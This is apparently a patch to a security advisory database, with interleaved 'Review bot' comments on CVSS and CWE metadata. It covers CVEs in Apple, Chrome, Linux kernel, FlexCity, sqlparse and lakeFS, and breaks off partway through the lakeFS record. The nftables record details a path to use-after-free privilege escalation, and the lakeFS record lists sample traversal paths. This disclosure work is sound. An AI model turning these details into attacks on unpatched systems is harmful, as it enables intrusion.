diff --git a/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json b/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json
index b80d4bf5b5be7..aec71790559c2 100644
--- a/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json
+++ b/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5m2c-5h5x-7j8g",
- "modified": "2026-02-05T21:32:39Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-05T18:30:30Z",
"aliases": [
"CVE-2025-68721"
@@ -19,6 +19,10 @@
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68721"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/osmancanvural/CVE-2025-68721"
+ },
{
"type": "WEB",
"url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Improper-Access-Control-Vulnerability-CVE-2025-68721-_406.html"
diff --git a/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json b/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json
index 3cea669a88c23..daa49651bebb5 100644
--- a/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json
+++ b/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-8qwr-rrp6-9jjv",
- "modified": "2026-02-10T15:30:21Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-05T18:30:32Z",
"aliases": [
"CVE-2025-68723"
@@ -19,6 +19,10 @@
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68723"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/osmancanvural/CVE-2025-68723"
+ },
{
"type": "WEB",
"url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Stored-XSS-Vulnerabilities-CVE-2025-68723-_408.html"
diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json
index f074b5365ed5c..583c0515f5221 100644
--- a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json
+++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-8xrx-9wj4-6775",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-12T00:31:04Z",
"aliases": [
"CVE-2026-20649"
],
"details": "A logging issue was addressed with improved data redaction. This issue is fixed in watchOS 26.3, iOS 26.3 and iPadOS 26.3, tvOS 26.3, macOS Tahoe 26.3. A user may be able to view sensitive user information.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
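Review bot: The vector added here, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` with `severity` raised to `HIGH`, describes an unauthenticated, network-reachable confidentiality break, but the `details` context line describes a local logging/data-redaction issue (`A user may be able to view sensitive user information`); the near-identical GHSA-366r-6rjw-f277 earlier in this patch receives `AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N` and `LOW` for the same wording. Both vectors appear to be mirrored from NVD as-is, so this is not something the bot should rewrite, but the disagreement is a reason to flag this entry for human review rather than let `HIGH` stand unexamined.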
@@ -33,7 +38,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:07Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json
index a604220a3fc44..c7a7a06ab87da 100644
--- a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json
+++ b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json
@@ -1,13 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-cqx4-h5ph-3xj9",
- "modified": "2026-02-12T21:31:25Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-03T03:30:26Z",
"aliases": [
"CVE-2025-15556"
],
"details": "Notepad++ versions prior to 8.8.9, when using the WinGUp updater, contain an update integrity verification vulnerability where downloaded update metadata and installers are not cryptographically verified. An attacker able to intercept or redirect update traffic can cause the updater to download and execute an attacker-controlled installer, resulting in arbitrary code execution with the privileges of the user.",
"severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ },
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json
index 2031bb8024ac1..d0aa53669911d 100644
--- a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json
+++ b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-hpj8-5pv7-f58m",
- "modified": "2026-02-11T21:30:40Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-11T21:30:40Z",
"aliases": [
"CVE-2026-2321"
],
"details": "Use after free in Ozone in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -27,7 +32,7 @@
"cwe_ids": [
"CWE-416"
],
- "severity": null,
+ "severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T19:15:52Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json b/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json
new file mode 100644
index 0000000000000..811f6456fe8f4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json
@@ -0,0 +1,49 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jh9m-9mr6-3ghc",
+ "modified": "2026-02-13T15:30:26Z",
+ "published": "2026-02-13T15:30:26Z",
+ "aliases": [
+ "CVE-2026-23111"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate()\n\nnft_map_catchall_activate() has an inverted element activity check\ncompared to its non-catchall counterpart nft_mapelem_activate() and\ncompared to what is logically required.\n\nnft_map_catchall_activate() is called from the abort path to re-activate\ncatchall map elements that were deactivated during a failed transaction.\nIt should skip elements that are already active (they don't need\nre-activation) and process elements that are inactive (they need to be\nrestored). Instead, the current code does the opposite: it skips inactive\nelements and processes active ones.\n\nCompare the non-catchall activate callback, which is correct:\n\n nft_mapelem_activate():\n if (nft_set_elem_active(ext, iter->genmask))\n return 0; /* skip active, process inactive */\n\nWith the buggy catchall version:\n\n nft_map_catchall_activate():\n if (!nft_set_elem_active(ext, genmask))\n continue; /* skip inactive, process active */\n\nThe consequence is that when a DELSET operation is aborted,\nnft_setelem_data_activate() is never called for the catchall element.\nFor NFT_GOTO verdict elements, this means nft_data_hold() is never\ncalled to restore the chain->use reference count. Each abort cycle\npermanently decrements chain->use. Once chain->use reaches zero,\nDELCHAIN succeeds and frees the chain while catchall verdict elements\nstill reference it, resulting in a use-after-free.\n\nThis is exploitable for local privilege escalation from an unprivileged\nuser via user namespaces + nftables on distributions that enable\nCONFIG_USER_NS and CONFIG_NF_TABLES.\n\nFix by removing the negation so the check matches nft_mapelem_activate():\nskip active elements, process inactive ones.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23111"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/1444ff890b4653add12f734ffeffc173d42862dd"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/42c574c1504aa089a0a142e4c13859327570473d"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/8b68a45f9722f2babe9e7bad00aa74638addf081"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/8c760ba4e36c750379d13569f23f5a6e185333f5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/b9b6573421de51829f7ec1cce76d85f5f6fbbd7f"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/f41c5d151078c5348271ffaf8e7410d96f2d82f8"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T14:16:10Z"
+ }
+}
\ No newline at end of file
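Review bot: `cwe_ids` is `[]` although the `details` text states the outcome explicitly (`resulting in a use-after-free`) and this same patch tags the Chrome entry GHSA-hpj8-5pv7-f58m with `CWE-416` for the same bug class; consumers that triage by CWE will not see this one. The sibling GHSA-jjrf-jfrm-p64x (`nvmet-tcp` bounds checks, `walk past cmd->req.sg`) has the same gap for an out-of-bounds access. Both also have `severity: []` and `database_specific.severity: null`, which is expected this soon after `nvd_published_at`, but the local privilege escalation described here makes it a candidate for early scoring.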
diff --git a/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json b/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json
new file mode 100644
index 0000000000000..20a23f7f6b607
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json
@@ -0,0 +1,53 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jjrf-jfrm-p64x",
+ "modified": "2026-02-13T15:30:26Z",
+ "published": "2026-02-13T15:30:26Z",
+ "aliases": [
+ "CVE-2026-23112"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec\n\nnvmet_tcp_build_pdu_iovec() could walk past cmd->req.sg when a PDU\nlength or offset exceeds sg_cnt and then use bogus sg->length/offset\nvalues, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining\nentries, and sg->length/offset before building the bvec.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23112"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/043b4307a99f902697349128fde93b2ddde4686c"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/1385be357e8acd09b36e026567f3a9d5c61139de"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/19672ae68d52ff75347ebe2420dde1b07adca09f"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/42afe8ed8ad2de9c19457156244ef3e1eca94b5d"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/52a0a98549344ca20ad81a4176d68d28e3c05a5c"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/ab200d71553bdcf4de554a5985b05b2dd606bc57"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/dca1a6ba0da9f472ef040525fab10fd9956db59f"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T14:16:10Z"
+ }
+}
\ No newline at end of file
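Review bot: The new record ships with `"severity": []`, `"cwe_ids": []` and `"affected": []`, so consumers get no version range at all even though the hunk links six stable-branch fix commits; until a range is populated, operators have only the git.kernel.org commit IDs to check against their kernel. The description says nvmet_tcp_build_pdu_iovec() walks past cmd->req.sg when a PDU length or offset exceeds sg_cnt and then feeds bogus sg values to _copy_to_iter(); since nvmet-tcp is the NVMe/TCP target side, those PDU fields presumably arrive from a network initiator, which makes this a remotely triggerable out-of-bounds access rather than a local bug, and the record should say so. At minimum `"cwe_ids": ["CWE-125"]` (or CWE-787, depending on which side of the copy the fix commit shows is reached) is better than an empty list for anyone filtering on weakness class.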
diff --git a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json
index f1b4fbd1723f2..1c90d7d688765 100644
--- a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json
+++ b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json
@@ -54,7 +54,8 @@
],
"database_specific": {
"cwe_ids": [
- "CWE-125"
+ "CWE-125",
+ "CWE-77"
],
"severity": "MODERATE",
"github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json
new file mode 100644
index 0000000000000..3e77fd03b44d2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q3vc-646j-prpq",
+ "modified": "2026-02-13T15:30:26Z",
+ "published": "2026-02-13T15:30:26Z",
+ "aliases": [
+ "CVE-2025-14349"
+ ],
+ "details": "Privilege Defined With Unsafe Actions, Missing Authentication for Critical Function vulnerability in Universal Software Inc. FlexCity/Kiosk allows Accessing Functionality Not Properly Constrained by ACLs, Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14349"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-26-0065"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-267"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T14:16:09Z"
+ }
+}
\ No newline at end of file
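Review bot: The description names two weaknesses, "Privilege Defined With Unsafe Actions" (CWE-267) and "Missing Authentication for Critical Function" (CWE-306), but `cwe_ids` carries only `"CWE-267"`; add `"CWE-306"` so the missing-authentication aspect is searchable. The CVSS vector also says `PR:L`, which sits oddly next to "Missing Authentication for Critical Function": if the affected function is reachable without credentials the vector should be `PR:N` (raising the base score), and if low privileges really are required the description should say which ones. The only reference is the USOM bulletin, which is the same URL the sibling record for CVE-2026-1619 uses against the same `from 1.0 before 1.0.36` range; if a vendor note for 1.0.36 exists it should be linked so readers can confirm the fixed version independently.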
diff --git a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json
index 01e122e5c3ef9..1d4011263dfdb 100644
--- a/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json
+++ b/advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-r5cf-37x9-4hgv",
- "modified": "2026-02-12T00:31:05Z",
+ "modified": "2026-02-13T15:30:24Z",
"published": "2026-02-12T00:31:05Z",
"aliases": [
"CVE-2026-20658"
],
"details": "A package validation issue was addressed by blocking the vulnerable package. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -21,7 +26,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:08Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json
index c3e366958502c..bd082985f53f7 100644
--- a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json
+++ b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-rp46-r563-jrc7",
- "modified": "2026-02-13T12:31:21Z",
+ "modified": "2026-02-13T15:30:25Z",
"published": "2026-02-13T12:31:21Z",
"aliases": [
"CVE-2025-33042"
@@ -17,6 +17,10 @@
{
"type": "WEB",
"url": "https://lists.apache.org/thread/fy88wmgf1lj9479vrpt12cv8x73lroj1"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2026/02/12/2"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json
index 825e2b9640018..a0236b79690b7 100644
--- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json
+++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-wp4v-6rrv-wqv9",
- "modified": "2026-02-12T00:31:05Z",
+ "modified": "2026-02-13T15:30:24Z",
"published": "2026-02-12T00:31:05Z",
"aliases": [
"CVE-2026-20655"
],
"details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
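Review bot: The new CVSS vector `AV:L/AC:L/PR:L/UI:N` does not match the description, which says the attacker needs physical access to a locked device: physical access is `AV:P`, and an attacker at a locked screen holds no account on the device, so `PR:N` is the usual choice rather than `PR:L`. `CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` still scores 4.6 (medium), so the `"severity": "MODERATE"` label set in the next hunk survives either way, but the vector should reflect the stated preconditions or downstream tooling that reasons about attack vector will misclassify this as a local-app bug. This mirrors NVD's scoring, so the discrepancy is presumably best raised upstream rather than patched only in this mirror.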
@@ -25,7 +30,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:08Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json
index f64c8a37255a3..ceb4a2d258e16 100644
--- a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json
+++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-wxwg-9693-mqg4",
- "modified": "2026-02-12T00:31:05Z",
+ "modified": "2026-02-13T15:30:24Z",
"published": "2026-02-12T00:31:05Z",
"aliases": [
"CVE-2026-20656"
],
"details": "A logic issue was addressed with improved validation. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, Safari 26.3, macOS Tahoe 26.3. An app may be able to access a user's Safari history.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -29,7 +34,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "LOW",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:08Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json
new file mode 100644
index 0000000000000..877ed83397513
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xgwv-vx48-69hc",
+ "modified": "2026-02-13T15:30:26Z",
+ "published": "2026-02-13T15:30:26Z",
+ "aliases": [
+ "CVE-2026-1619"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in Universal Software Inc. FlexCity/Kiosk allows Exploitation of Trusted Identifiers.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1619"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-26-0065"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T14:16:10Z"
+ }
+}
\ No newline at end of file
From d14188d18e8e098c25df31407d6032dc397d499c Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 16:17:56 +0000
Subject: [PATCH 06/36] Publish Advisories
GHSA-27jp-wm6q-gp25
GHSA-699m-4v95-rmpm
---
.../GHSA-27jp-wm6q-gp25.json | 66 ++++++++++++++++++
.../GHSA-699m-4v95-rmpm.json | 68 +++++++++++++++++++
2 files changed, 134 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
new file mode 100644
index 0000000000000..e6959febeead2
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
@@ -0,0 +1,66 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-27jp-wm6q-gp25",
+ "modified": "2026-02-13T16:16:11Z",
+ "published": "2026-02-13T16:16:11Z",
+ "aliases": [],
+ "summary": "sqlparse: formatting list of tuples leads to denial of service",
+ "details": "### Summary\nThe below gist hangs while attempting to format a long list of tuples.\n\nThis was found while [drafting a regression test for Dja\nngo 5.2's composite primary key feature](https://code.djangoproject.com/ticket/36416#comment:3), which allows querying composite fields with tuples.\n\n###",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "sqlparse"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.5.4"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.5.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-27jp-wm6q-gp25"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/commit/40ed3aa958657fa4a82055927fa9de70ab903360"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/andialbrecht/sqlparse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/releases/tag/0.5.4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-770"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T16:16:11Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
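Review bot: The `details` string looks truncated: it breaks the word "Django" across a line ("Dja\nngo") and ends on a bare `###` heading, so the gist, patch and workaround sections the summary alludes to never made it into the record and should be re-imported from the upstream advisory. The CVSS 4.0 vector also reads `VI:L/VA:N`, but the summary and title describe a hang (denial of service), which is an availability impact rather than an integrity one; `VI:N/VA:L` (or `VA:H` if the hang is unbounded) is what the described behaviour supports. No CVE alias is recorded; if one is assigned it should be added so scanners keyed on CVE IDs pick this up.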
diff --git a/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
new file mode 100644
index 0000000000000..32fa774fc8cb7
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-699m-4v95-rmpm",
+ "modified": "2026-02-13T16:16:04Z",
+ "published": "2026-02-13T16:16:04Z",
+ "aliases": [
+ "CVE-2026-26187"
+ ],
+ "summary": "lakeFS vulnerable to path traversal in local block adapter allow cross-namespace and sibling directory access",
+ "details": "## Summary\n\nTwo path traversal vulnerabilities in the local block adapter allow authenticated users to read and write files outside their designated storage boundaries.\n\n## Details\n\nThe local block adapter in `pkg/block/local/adapter.go` had two path traversal vulnerabilities:\n\n### 1. Prefix Bypass Vulnerability\n\nThe `verifyRelPath` function used `strings.HasPrefix()` to verify that requested paths fall within the configured storage directory. This check was insufficient because it validated only the path prefix without requiring a path separator, allowing access to sibling directories with similar names.\n\n**Example:** If the adapter is configured with base path `/data/lakefs`:\n\n| Path | Expected | Actual |\n|------|----------|--------|\n| `/data/lakefs/valid/file.txt` | Allowed | Allowed |\n| `/data/lakefs_evil/secret.txt` | Blocked | **Vulnerable** |\n| `/data/lakefs_backup/data.db` | Blocked | **Vulnerable** |\n\n### 2. Namespace Escape via Identifier\n\nThe adapter verified that resolved paths stayed within the adapter's base path, but did not verify that object identifiers stayed within their designated storage namespace. 
